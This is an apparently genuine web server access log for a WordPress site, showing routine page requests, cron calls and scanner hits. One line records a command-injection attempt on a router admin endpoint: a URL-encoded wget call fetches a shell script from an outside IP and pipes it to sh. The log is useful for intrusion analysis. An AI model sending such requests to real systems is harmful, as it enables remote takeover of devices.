47.109.44.73 - - [16/Sep/2025:15:35:35 +0800] "GET /news/page/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [16/Sep/2025:15:41:28 +0800] "GET /wp-includes/css/dist/block-library/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:15:41:33 +0800] "POST /wp-cron.php?doing_wp_cron=1758008493.6016409397125244140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.240.223.202 - - [16/Sep/2025:15:41:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
121.42.249.16 - - [16/Sep/2025:15:43:43 +0800] "GET /portfolio-category/cold-rolled-coil/ HTTP/1.1" 200 20900 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [16/Sep/2025:15:45:44 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/fonts/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [16/Sep/2025:15:47:22 +0800] "GET /wp-content/cache/min/1/wp-content/themes/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
27.252.82.221 - - [16/Sep/2025:15:48:37 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [16/Sep/2025:15:48:37 +0800] "POST /wp-cron.php?doing_wp_cron=1758008917.7323420047760009765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:15:48:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:15:49:06 +0800] "POST /wp-cron.php?doing_wp_cron=1758008945.9929370880126953125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:15:49:06 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.38.44.221 - - [16/Sep/2025:15:49:13 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
176.65.148.40 - - [16/Sep/2025:15:51:44 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:15:54:04 +0800] "POST /wp-cron.php?doing_wp_cron=1758009244.2417778968811035156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.236.230 - - [16/Sep/2025:15:54:04 +0800] "GET /wp-json/oembed/1.0/ HTTP/1.1" 200 543 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:15:57:08 +0800] "POST /wp-cron.php?doing_wp_cron=1758009428.7567410469055175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
